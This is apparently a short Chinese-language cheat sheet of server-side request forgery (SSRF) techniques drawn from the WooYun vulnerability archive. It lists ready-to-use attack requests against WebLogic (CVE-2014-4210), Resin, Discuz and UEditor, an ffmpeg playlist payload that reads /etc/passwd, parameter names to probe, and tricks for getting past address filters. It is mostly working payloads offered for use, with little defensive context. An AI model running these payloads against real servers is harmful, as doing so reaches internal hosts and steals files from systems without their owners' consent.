wooyun常见ssrf总结
前言
wooyun有很多旧时代知识沉淀,需要多看看,才能更好地迈向新时代。
0x01. weblogic
CVE-2014-4210
http://221.239.120.208/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.1.9.136&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search
0x02. resin
http://xxxx/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd
0x03.xxe
解析xml的地方可能产生xxe漏洞,也能用于利用ssrf
0x04. ffmpg
早期ffmpg是存在ssrf漏洞的,现在应该基本没有了。
如果读取多行,可以用subfile
#EXTM3U #EXT-X-MEDIA-SEQUENCE:0 #EXTINF:10.0, concat:http://val.com/header.m3u8|subfile,,start,0,end,31,,:///etc/passwd|subfile,,start,32,end,64,,:///etc/passwd|subfile,,start,65,end,97,,:///etc/passwd #EXT-X-ENDLIST 使用subfile
0x05.discuz
discuz一些版本存在ssrf
http://xxxx/bbs/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://xxxxxxxxxxxxxx.jpg[/img]&formhash=09cec465
3.x版本需要带上formhash
0x06.ueditor+dnsrebind
/editor/ueditor/php/controller.php?action=catchimage&source[]=http://my.ip/?aaa=1%26logo.png
0x07.常见的业务接口
剩下就是一些和业务相关的了,图片、下载、获取资源等
src_url=
sr=
url=
qrcodeUrl=
picPath=
source_url=
upfile=
img=
source=
pageurl=
remoteUrl=
path=
p=
key=
link=
domain=
apiurl=
0x08.绕过姿势
实战中用的比较多的是
1.@
2.xip.io
3.进制
4.302(短网址)
5.dnsrebind
6.unicode
7.wooyun看到有些人是这么绕的127.0.0.1a,可能是判定黑名单的在强制转换前面。
8.xss,有的后端会解析输入的js返回到前端,这里也是存在ssrf的可能的。可能位置在文档、渲染等地方